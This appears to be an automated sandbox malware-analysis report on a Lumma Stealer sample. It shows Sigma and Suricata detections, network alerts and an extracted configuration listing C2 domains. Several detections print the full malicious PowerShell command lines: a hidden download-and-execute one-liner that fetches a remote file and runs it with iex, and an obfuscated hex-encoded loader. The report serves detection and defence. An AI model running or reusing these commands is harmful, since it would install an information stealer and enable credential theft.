C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C343E27EEC5C4191D27011B33568FE6B0ECE385FE81FF1

Sigma detected: PowerShell Download Pattern

Source: Process started

Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D1272

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D1272

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D1272

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C343E27EEC5C4191D27011B33568FE6B0ECE385FE81FF1

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C343E27EEC5C4191D27011B33568FE6B0ECE385FE81FF1

Data Obfuscation

Sigma detected: Powershell Download and Execute IEX

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D1272

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-21T21:06:21.265075+0100	2028371	3	Unknown Traffic	192.168.11.20	49756	104.21.96.1	443	TCP
2024-12-21T21:06:23.516539+0100	2028371	3	Unknown Traffic	192.168.11.20	49757	104.21.96.1	443	TCP
2024-12-21T21:06:32.527624+0100	2028371	3	Unknown Traffic	192.168.11.20	49770	104.21.96.1	443	TCP
2024-12-21T21:06:33.658430+0100	2028371	3	Unknown Traffic	192.168.11.20	49771	104.21.96.1	443	TCP
2024-12-21T21:06:34.588053+0100	2028371	3	Unknown Traffic	192.168.11.20	49772	104.21.96.1	443	TCP
2024-12-21T21:06:35.902005+0100	2028371	3	Unknown Traffic	192.168.11.20	49773	104.21.96.1	443	TCP
2024-12-21T21:06:37.227791+0100	2028371	3	Unknown Traffic	192.168.11.20	49774	104.21.96.1	443	TCP
2024-12-21T21:06:38.353632+0100	2028371	3	Unknown Traffic	192.168.11.20	49775	104.21.96.1	443	TCP
2024-12-21T21:06:42.569447+0100	2028371	3	Unknown Traffic	192.168.11.20	49776	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-21T21:06:22.231879+0100	2054653	1	A Network Trojan was detected	192.168.11.20	49756	104.21.96.1	443	TCP
2024-12-21T21:06:24.218240+0100	2054653	1	A Network Trojan was detected	192.168.11.20	49757	104.21.96.1	443	TCP
2024-12-21T21:06:50.415838+0100	2054653	1	A Network Trojan was detected	192.168.11.20	49776	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-21T21:06:22.231879+0100	2049836	1	A Network Trojan was detected	192.168.11.20	49756	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-21T21:06:24.218240+0100	2049812	1	A Network Trojan was detected	192.168.11.20	49757	104.21.96.1	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-21T21:06:37.733511+0100	2048094	1	Malware Command and Control Activity Detected	192.168.11.20	49774	104.21.96.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 8.2.powershell.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["surmisehotte.click", "aspecteirs.lat", "energyaffai.lat", "crosshuaht.lat", "discokeyus.lat", "grannyejh.lat", "sustainskelet.lat", "rapeflowwj.lat", "necklacebudi.lat"], "Build id": "yJEcaG--singl6"}

Sample uses string decryption to hide its real strings

Source: 8.2.powershell.exe.400000.0.raw.unpack	String decryptor: rapeflowwj.lat
Source: 8.2.powershell.exe.400000.0.raw.unpack	String decryptor: crosshuaht.lat
Source: 8.2.powershell.exe.400000.0.raw.unpack	String decryptor: sustainskelet.lat
Source: 8.2.powershell.exe.400000.0.raw.unpack	String decryptor: aspecteirs.lat
Source: 8.2.powershell.exe.400000.0.raw.unpack	String decryptor: energyaffai.lat
Source: 8.2.powershell.exe.400000.0.raw.unpack	String decryptor: necklacebudi.lat
Source: 8.2.powershell.exe.400000.0.raw.unpack	String decryptor: discokeyus.lat
Source: 8.2.powershell.exe.400000.0.raw.unpack	String decryptor: grannyejh.lat
Source: 8.2.powershell.exe.400000.0.raw.unpack	String decryptor: surmisehotte.click
Source: 8.2.powershell.exe.400000.0.raw.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 8.2.powershell.exe.400000.0.raw.unpack	String decryptor: TeslaBrowser/5.5
